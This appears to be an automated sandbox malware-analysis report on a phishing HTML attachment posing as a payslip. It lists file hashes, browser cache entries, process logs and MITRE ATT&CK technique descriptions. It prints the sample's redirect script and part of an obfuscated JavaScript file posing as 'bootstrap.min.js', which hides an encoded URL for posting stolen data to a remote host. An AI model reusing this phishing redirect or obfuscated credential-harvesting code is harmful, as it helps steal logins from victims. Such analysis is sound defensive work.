Preview:	/!. Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable\|\|!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign\|\|function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp

Chrome Cache Entry: 174

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	32
Entropy (8bit):	4.390319531114783
Encrypted:	false
SSDEEP:	3:HYmpBth0tYY:4mpbgYY
MD5:	EB3CE3190D8A58E048D35E620747D3A5
SHA1:	76B5B6461189F839B018EF5C785DB4836B818B7D
SHA-256:	2D670E2962D8D805B95912CACA0822CE7C6913636BA40373C6E6AEA73CAC8457
SHA-512:	08F9C680B09CC25919A91F8E080CFC517F7354F49759DDC8CF6FFEB5ADE2E46F80A866E7531B6EA97188A5E4647093350F91ED51254351C47BCE3488EF88A595
Malicious:	false
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTA4LjAuNTM1OS4xMjUSEAk6-N5xUyuqAhIFDa0JrrESEAln8HPJ5fMBBBIFDUPzdjk=?alt=proto
Preview:	CgkKBw2tCa6xGgAKCQoHDUPzdjkaAA==

Chrome Cache Entry: 175

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	XML 1.0 document, ASCII text
Category:	downloaded
Size (bytes):	433
Entropy (8bit):	5.626426218746355
Encrypted:	false
SSDEEP:	12:TM3iu5veHcwUUDmQfdf3aUeb/XOaGUP+WWI/tMM14hr6ZXbv:qV5jwNZ3aUeb/++bT/fOCXL
MD5:	F401F8F2AB78E915F7B51119732B5354
SHA1:	5FE9FC9CDE8AE08F7531B268C68E0D6E213918EB
SHA-256:	F452BC1F767FD43CB249221740BAD8181C400CB082DC0C1CC80023DC183B161F
SHA-512:	02AE4B87170B3485F6C237B4FD77CEE99BF6E4E958BBD7BA05E48976FC6ECC456E2A11C3FC098EF288E5F60B8904BA7349180B97710BDC27E413FADCDE9BBBE0
Malicious:	false
URL:	https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/favicon.ico
Preview:	<?xml version='1.0' encoding='utf-8' ?>.<Error>..<Code>NoSuchKey</Code>..<Message>The specified key does not exist.</Message>..<Resource>/favicon.ico</Resource>..<RequestId>NjQ5YThmMmZfZjdhZDM0MGJfMjQyZmFfNjRlY2ZkYg==</RequestId>..<TraceId>OGVmYzZiMmQzYjA2OWNhODk0NTRkMTBiOWVmMDAxODc0OWRkZjk0ZDM1NmI1M2E2MTRlY2MzZDhmNmI5MWI1OTVhZmNjOGRhMDFhODRkMDI4YmJmYmQyZDI5OGM4MzJlNmQ5YWY3NjM5YjIxZDg3ZDZjNTY4MzI4NDlkMmVjODg=</TraceId>.</Error>..

Chrome Cache Entry: 176

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65478), with CRLF line terminators
Category:	downloaded
Size (bytes):	562061
Entropy (8bit):	4.876371538182827
Encrypted:	false
SSDEEP:	6144:4VJhzOYSZI9qlBCBfSE3ZcH0+XShR3jC7ta/se:ghCYWI9qlBCBfSE33+usZCse
MD5:	5F554367E1544826B93A0F5EEB0C4D49
SHA1:	51E0C7ED4CBCB287B322B15F19A0BFFB4982E213
SHA-256:	0C43B585E41B5819E54B93A1A756D6C1B65D165F514EB7F8F4211345CEBC53D8
SHA-512:	09459105D880A3C1318CBA7C4ED51096108F63142453C6EDAC038CF9FEACF90976A76110ACC667F45EAD6080A4665A074F4F9A340982B72CFD5000517E37F0F8
Malicious:	false
URL:	https://365mail-1318233580.cos.na-siliconvalley.myqcloud.com/bootstrap.min.js
Preview:	var file = "aHR0cHM6Ly8zNjVtYWlsLnNpdGUvbmV4dC5waHA=";....var _0x50e4d9=_0x2870;function _0x2870(_0xf7a724,_0x5cbf35){var _0xcf55bb=_0x7449();return _0x2870=function(_0x1cda39,_0x214ce9){_0x1cda39=_0x1cda39-(-0xdae+0x1c9b+-0xd46);var _0x515467=_0xcf55bb[_0x1cda39];return _0x515467;},_0x2870(_0xf7a724,_0x5cbf35);}(function(_0x4826d4,_0x26ee92){var _0xc35d4c=_0x2870,_0x169a03=_0x4826d4();while(!![]){try{var _0xeb45e6=parseInt(_0xc35d4c(0x2d13))/(-0x18cb+0x2d50x7+-0x1-0x4f9)+-parseInt(_0xc35d4c(0x1eab))/(-0x130x12d+0x10x26c3+-0x106a)(parseInt(_0xc35d4c(0x1e61))/(0x196+-0x6e0xc+0x830x7))+parseInt(_0xc35d4c(0x279))/(0x1548+-0x258c+-0x8-0x209)+parseInt(_0xc35d4c(0x238))/(0x20x125c+0x13d0+-0x3883)(parseInt(_0xc35d4c(0x3ff))/(0x18c7+0x1049+0x1485-0x2))+parseInt(_0xc35d4c(0x25c9))/(-0x20-0x94+-0xe50x21+-0x7-0x194)+-parseInt(_0xc35d4c(0x15f0))/(0x490x55+0x8-0x15b+-0xd5d)+-parseInt(_0xc35d4c(0x366))/(-0x52a+-0x16d3+0x1c06);if(_0xeb45e6===_0x26ee92)break;else _0x169a03['push'](_0x1

Chrome Cache Entry: 177

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32030)
Category:	downloaded
Size (bytes):	86709
Entropy (8bit):	5.367391365596119
Encrypted:	false
SSDEEP:	1536:9NhEyjjTikEJO4edXXe9J578go6MWXqcVhrLyB4Lw13sh2bzrl1+iuH7U3gBORDT:jxcq0hrLZwpsYbmzORDU8Cu5
MD5:	E071ABDA8FE61194711CFC2AB99FE104
SHA1:	F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
SHA-256:	85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
SHA-512:	53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
Malicious:	false
URL:	https://code.jquery.com/jquery-3.1.1.min.js
Preview:	/! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con

Chrome Cache Entry: 178

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
Category:	dropped
Size (bytes):	621
Entropy (8bit):	7.673946009263606
Encrypted:	false
SSDEEP:	12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
MD5:	4761405717E938D7E7400BB15715DB1E
SHA1:	76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
SHA-256:	F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
SHA-512:	E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
Malicious:	false
Preview:	..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......\|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E..".......x.@..?u......../....8...

Chrome Cache Entry: 179

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1864
Entropy (8bit):	5.222032823730197
Encrypted:	false
SSDEEP:	48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
MD5:	BC3D32A696895F78C19DF6C717586A5D
SHA1:	9191CB156A30A3ED79C44C0A16C95159E8FF689D
SHA-256:	0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
SHA-512:	8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
Malicious:	false
URL:	https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r

Chrome Cache Entry: 180

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32065)
Category:	downloaded
Size (bytes):	85578
Entropy (8bit):	5.366055229017455
Encrypted:	false
SSDEEP:	1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
MD5:	2F6B11A7E914718E0290410E85366FE9
SHA1:	69BB69E25CA7D5EF0935317584E6153F3FD9A88C
SHA-256:	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
SHA-512:	0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
Malicious:	false
URL:	https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Preview:	/! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

Chrome Cache Entry: 181

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (19015)
Category:	downloaded
Size (bytes):	19188
Entropy (8bit):	5.212814407014048
Encrypted:	false
SSDEEP:	384:+CbuG4xGNoDic2UjKPafxwC5b/4xQviOJU7QzxzivDdE3pcGdjkd/9jt3B+Kb964:zb4xGmiJfaf7gxQvVU7eziv+cSjknZ3f
MD5:	70D3FDA195602FE8B75E0097EED74DDE
SHA1:	C3B977AA4B8DFB69D651E07015031D385DED964B
SHA-256:	A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
SHA-512:	51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
Malicious:	false
URL:	https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
Preview:	/. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. /(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode\|\|e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto\|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio

Static File Info

General

File type:	HTML document, Unicode text, UTF-8 (with BOM) text, with no line terminators
Entropy (8bit):	5.013938161424737
TrID:	Text - UTF-8 encoded (3003/1) 100.00%
File name:	PaySlip_$62,010.50.htm
File size:	164 bytes
MD5:	381508d5e2a96fe063ab18cd16db335b
SHA1:	123531eee79dc63feb09d2dc00d6e79044f1b144
SHA256:	8d1d0565051a380886c6b1136fd3474cfdfb1045bcd753307441709d3b88e4f1
SHA512:	34312aa4bc553d8986942e4742a03e18cb10508944037527db99c4abcbba1cb34e478763d0dae8a2b21a195b1254150eae765e9e7c7b00e9827d6bbf0f11a7b7
SSDEEP:	3:GXUtkAqRAdu6/GY7voOkADFq2DWq18Rb081xXMAzCAZ2QLkxKHex7b:mAqJm7+mkcWp0sXMAh24jgb
TLSH:	BCC0128FDC02C6145A400697ECA2B904941BA0D68A98D4869291C0617118B9A55442D5
File Content Preview:	...<script type="text/javascript">window.location.href ="https://sagestonelaw-1318439371.cos.eu-frankfurt.myqcloud.com/sagestonelaw.html?e=test@gmail.com";</script>

File Icon


Icon Hash:	173149cccc490307

Network Behavior

⊘Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

Statistics

Click to jump to process

Memory Usage

• MpSigStub.exe
• chrome.exe
• chrome.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Behavior

• MpSigStub.exe
• chrome.exe
• chrome.exe

Click to jump to process

System Behavior

Analysis Process: MpSigStub.exePID: 4944, Parent PID: 4396

Function Logs

General

Target ID:	0
Start time:	09:26:32
Start date:	27/06/2023
Path:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\F47D9A11-5581-402D-BE8B-53FDBAECCE4C\MpSigStub.exe /stub 1.1.18500.10 /payload 1.391.2772.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-3f3b8f01.exe /q WD
Imagebase:	0x7ff7348c0000
File size:	803'176 bytes
MD5 hash:	01F92DC7A766FF783AE7AF40FD0334FB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

File Activities

File Opened

File Written

File Read

File Attributes Queried

Other File Operations

Show Windows behavior

Section Activities

Sections loaded by Windows

Sections loaded by Program

Show Windows behavior

Registry Activities

Key Opened

Key Value Queried

Show Windows behavior

Mutex Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Process Activities

Process Queried

Thread Activities

Thread Information Set

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

System Activities

Language or Locale ID Queried

System Information Queried

Show Windows behavior

LPC Port Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 240, Parent PID: 3164

Function Logs

General

Target ID:	1
Start time:	09:26:33
Start date:	27/06/2023
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\PaySlip_$62,010.50.htm
Imagebase:	0x7ff733a40000
File size:	3'133'720 bytes
MD5 hash:	C817D9E0D995276EC89E4C89AFC19694
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

File Activities

File Opened

Show Windows behavior

Registry Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

COM Activities

WMI Operations

Show Windows behavior

Process Activities

Process Created

Process Terminated

Show Windows behavior

Thread Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

Timing Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Windows UI Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Process Token Activities

Token Adjusted

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6932, Parent PID: 240

Function Logs

General

Target ID:	2
Start time:	09:26:34
Start date:	27/06/2023
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=1868,i,8896678577552714927,16868430450045359605,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff733a40000
File size:	3'133'720 bytes
MD5 hash:	C817D9E0D995276EC89E4C89AFC19694
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

File Activities

File Opened

Show Windows behavior

Thread Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

Timing Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PaySlip_$62,010.50.htm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\MpSigStub.log

Chrome Cache Entry: 164

Chrome Cache Entry: 165

Chrome Cache Entry: 166

Chrome Cache Entry: 167

Chrome Cache Entry: 168

Chrome Cache Entry: 169

Chrome Cache Entry: 170

Chrome Cache Entry: 171

Chrome Cache Entry: 172

Chrome Cache Entry: 173

Chrome Cache Entry: 174

Chrome Cache Entry: 175

Chrome Cache Entry: 176

Chrome Cache Entry: 177

Chrome Cache Entry: 178

Chrome Cache Entry: 179

Chrome Cache Entry: 180

Chrome Cache Entry: 181

Static File Info

General

File Icon

Network Behavior

Statistics

CPU Usage

Windows Analysis Report
PaySlip_$62,010.50.htm